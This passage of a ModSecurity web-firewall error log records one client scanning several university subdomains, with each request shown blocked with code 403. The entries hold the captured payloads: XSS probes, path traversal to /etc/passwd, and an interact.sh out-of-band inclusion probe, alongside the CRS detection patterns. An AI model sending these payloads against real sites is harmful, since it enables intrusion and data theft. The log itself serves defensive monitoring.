"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/awstats/awredir.pl"] [unique_id "ZO15sMCo-f0AAAor7ogAAAAk"]
[Tue Aug 29 11:53:04.878674 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15sMCo-f0AAAoW7MgAAAAJ"]
[Tue Aug 29 11:53:04.908300 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAonhocAAAAg"]
[Tue Aug 29 11:53:04.909377 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAfWOUMAAAAL"]
[Tue Aug 29 11:53:04.909513 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAot8LoAAAAn"]
[Tue Aug 29 11:53:05.068476 2023] [:error] [pid 2599] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15scCo-f0AAAonhogAAAAg"]
[Tue Aug 29 11:53:05.727283 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0IIxPe0GnIO9Ehzy5hFS4kkT)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15scCo-f0AAAfWOUQAAAAL"]
[Tue Aug 29 11:53:06.050772 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoLfP0AAAAG"]
[Tue Aug 29 11:53:06.053814 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoml08AAAAf"]
[Tue Aug 29 11:53:06.053980 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAoW7MsAAAAJ"]
[Tue Aug 29 11:53:06.054180 2023] [:error] [pid 2607] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAov7fYAAAAH"]
[Tue Aug 29 11:53:06.119612 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15scCo-f0AAAoT7TsAAAAD"]
[Tue Aug 29 11:53:06.662830 2023] [:error] [pid 2607] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAov7fgAAAAH"]
[Tue Aug 29 11:53:06.665259 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAojaoMAAAAb"]
[Tue Aug 29 11:53:06.675734 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15ssCo-f0AAAofm4oAAAAX"]
[Tue Aug 29 11:53:07.653559 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAfWOUcAAAAL"]
[Tue Aug 29 11:53:08.257332 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoZ6ScAAAAK"]
[Tue Aug 29 11:53:08.260699 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAolKTUAAAAe"]
[Tue Aug 29 11:53:08.263194 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAnd3QEAAAAI"]
[Tue Aug 29 11:53:08.273520 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAfWOUgAAAAL"]
[Tue Aug 29 11:53:08.275662 2023] [:error] [pid 2589] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAodkp4AAAAS"]
[Tue Aug 29 11:53:08.355741 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAot8MAAAAAn"]
[Tue Aug 29 11:53:08.356729 2023] [:error] [pid 2606] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAouCygAAAAo"]
[Tue Aug 29 11:53:08.360967 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAohZ6YAAAAZ"]
[Tue Aug 29 11:53:08.361721 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAoqbO4AAAAj"]
[Tue Aug 29 11:53:08.364496 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15tMCo-f0AAAoW7M8AAAAJ"]
[Tue Aug 29 11:53:08.366167 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoXJuQAAAAP"]
[Tue Aug 29 11:53:08.366903 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAoLfQEAAAAG"]
[Tue Aug 29 11:53:08.367730 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAhoHWUAAAAl"]
